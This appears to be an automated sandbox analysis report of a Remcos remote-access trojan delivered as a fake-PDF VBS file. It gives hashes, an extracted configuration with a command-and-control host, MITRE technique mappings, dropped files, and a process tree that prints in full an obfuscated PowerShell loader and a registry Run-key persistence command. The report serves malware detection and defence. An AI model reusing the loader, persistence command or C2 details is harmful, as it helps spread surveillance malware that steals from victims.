remcos | 05f8fb9335954bb1069a2dd6dbbf5ba8c605e3923c3ed0c974f95cd62fd10b67

General

Target

328835_140264_1·pdf.vbs
Size

33KB
MD5

a9636ba5124550a3c145fef91fa5489d
SHA1

f3ab90b16fef6a323c1a4eb44aa47acecdac3ca6
SHA256

146882bf4a0d47c6db66dacbc5e283a85097a8320cf653641d380ebeab6c4c10
SHA512

9b004cbdd4d35d7dd7038efd8e002b7022e1e6e9c3207535934f362c8e3a45e23ebe87ec1de5f7c37ff8f6afdbe7fc5deb5baa56957ba365abc8dae8a7fce7fa
SSDEEP

768:+fZasQ6lMFJfJc4PCPPNngWWshZBTYRikWbVVw4OrxBX:eZasOFfXiPeWWs/BYse4OXX

Score

10^/10

remcos remotehost discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 8 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
3	2700	WScript.exe
7	2868	powershell.exe
9	2868	powershell.exe
11	2068	msiexec.exe
13	2068	msiexec.exe
15	2068	msiexec.exe
17	2068	msiexec.exe
18	2068	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\\Software\\Scarfpins\\').Hospitious24;%Milliammetres% ($Chevise)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2868	powershell.exe
592	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
2068	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
592	powershell.exe
2068	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

msiexec.execmd.exereg.exepowershell.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1928	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2868	powershell.exe
592	powershell.exe
592	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid	Process
592	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exe

description	pid	Process	procid_target
PID 2700 wrote to memory of 2868	2700	WScript.exe	30
PID 2700 wrote to memory of 2868	2700	WScript.exe	30
PID 2700 wrote to memory of 2868	2700	WScript.exe	30
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 592 wrote to memory of 2068	592	powershell.exe	35
PID 2068 wrote to memory of 3024	2068	msiexec.exe	36
PID 2068 wrote to memory of 3024	2068	msiexec.exe	36
PID 2068 wrote to memory of 3024	2068	msiexec.exe	36
PID 2068 wrote to memory of 3024	2068	msiexec.exe	36
PID 3024 wrote to memory of 1928	3024	cmd.exe	38
PID 3024 wrote to memory of 1928	3024	cmd.exe	38
PID 3024 wrote to memory of 1928	3024	cmd.exe	38
PID 3024 wrote to memory of 1928	3024	cmd.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\328835_140264_1·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:592
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\Software\Scarfpins\').Hospitious24;%Milliammetres% ($Chevise)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\Software\Scarfpins\').Hospitious24;%Milliammetres% ($Chevise)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
415a4593e0ac52efbc4006ae4f8d409a

SHA1
9980416dfa7da7a207d92dc34e770e72ae8bd4fa

SHA256
67b2e9b0821b09a579ad38f9a20c93881f13886f3eae99a90b0ca5c44f790c93

SHA512
437569522310812526f325e125be8098f656b8ff4a6be417b82989227fb0bc0b4d92cf1efa02944eaab90d7733946f84a2b835a10a03a119a32108d05351a84f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab47AC.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC073.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EHP80K4JX4OJIQCFRY5Q.temp

Filesize
7KB

MD5
8c8bcf6f6a3894590c6c0d73254cc5ab

SHA1
38b446cdd7fa692acb8974df3aa03baf418bbca5

SHA256
333f160b9c9733629c96d6d2384e8f17ecad713f6e6325e98cf24c99d1cd246a

SHA512
af403e68bd9035e83518d5c31eee964fc1591dbda87871e48634b21856dcf3de4ae251d86312f762e9142c699be6067df51dd3b3785607e904a109739ff072ed

Download Submit
C:\Users\Admin\AppData\Roaming\Svrmens.Jag

Filesize
472KB

MD5
446422fa7fea111877f8479983047645

SHA1
809d50b29798cc9fe183379389d98583d1ca71c4

SHA256
0cf981f2f27a017651d067e0864eb90e84b6b0dd02113e1aa82b19fd0337b4ee

SHA512
6060d17ba683b83060af3e01c4cce6bb99d20e9700b134bdf3bc11b884bdb26bb7120b95180acdc99f1cae956d7fdd9cc3d3e291648c4df522f11d58e4db6bef

Download Submit
memory/592-37-0x0000000006870000-0x00000000081E8000-memory.dmp

Filesize
25.5MB

Download
memory/2068-60-0x00000000006A0000-0x0000000001702000-memory.dmp

Filesize
16.4MB

Download
memory/2868-27-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-24-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-28-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

Filesize
4KB

Download
memory/2868-29-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-31-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-33-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-25-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-26-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-23-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp

Filesize
9.6MB

Download
memory/2868-22-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2868-21-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2868-20-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads